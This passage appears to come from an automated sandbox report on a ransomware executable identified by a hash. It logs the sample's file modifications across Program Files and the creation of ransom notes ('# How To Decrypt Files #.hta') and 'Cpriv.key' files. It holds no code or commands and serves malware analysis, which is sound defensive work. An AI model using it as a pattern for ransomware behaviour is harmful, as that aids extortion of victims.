Maker\Shared\DvdStyles\photoedge_videoinset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-windows.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21435_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART2.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsFormTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18242_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Category.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00262_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01063_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285462.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299171.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\defaults\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mouseover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00902_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Clarity.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00687_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287024.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MAIN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.fr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10289_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Services\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00232_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21512_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14790_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ARFR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Internet Explorer\ie9props.propdesc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\RESUME.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\WHOOSH.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00633_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107484.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00543_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\NamedURLs.HxK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21344_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00006_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR38F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106572.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\CAN.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGSIDEBRV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGZIPC.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.es\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\InfoPath.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSTORE_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSPPT.OLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205466.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21316_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mset7ge.kic de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\UrbanMergeFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02082_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099195.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRAPH_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\BREEZE.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 